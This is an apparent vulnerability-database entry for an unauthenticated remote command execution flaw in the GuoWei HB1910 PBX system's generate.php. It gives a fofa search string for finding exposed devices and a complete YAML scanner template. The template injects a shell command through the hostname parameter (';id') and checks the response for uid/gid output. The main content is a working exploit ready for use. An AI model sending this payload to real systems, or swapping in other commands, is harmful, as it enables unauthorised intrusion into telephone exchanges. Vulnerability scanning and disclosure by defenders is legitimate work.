guowei-hb1910-generate-rce: GuoWei HB1910 PBX generate.php Remote Command Execution

日期: 2025-09-01 | 影响软件: GuoWei HB1910 PBX | POC: 已公开

漏洞描述

GuoWei HB1910 Digital PBX System generate.php interface has an unauthenticated remote command execution vulnerability. An attacker can execute arbitrary system commands by sending a specially crafted request. fofa: body="themes/tenant/images/HB_logo.png"

PoC代码[已公开]

id: guowei-hb1910-generate-rce
info:
  name: GuoWei HB1910 PBX generate.php Remote Command Execution
  author: ZacharyZcR
  severity: critical
  verified: false
  description: |
    GuoWei HB1910 Digital PBX System generate.php interface has an unauthenticated remote command execution vulnerability.
    An attacker can execute arbitrary system commands by sending a specially crafted request.
    fofa: body="themes/tenant/images/HB_logo.png"
  reference:
    - https://github.com/wy876/POC/blob/main/%E6%B7%B1%E5%9C%B3%E5%9B%BD%E5%A8%81%E7%94%B5%E5%AD%90/%E5%9B%BD%E5%A8%81HB1910%E6%95%B0%E5%AD%97%E7%A8%8B%E6%8E%A7%E7%94%B5%E8%AF%9D%E4%BA%A4%E6%8D%A2%E6%9C%BAgenerate.php%E6%9C%AA%E6%8E%88%E6%9D%83RCE%E6%BC%8F%E6%B4%9E.md
  tags: guowei,rce
  created: 2024/12/31

rules:
  r0:
    request:
      method: GET
      path: /modules/ping/generate.php?send=Ping&hostname=;id
    expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r0()

相关漏洞推荐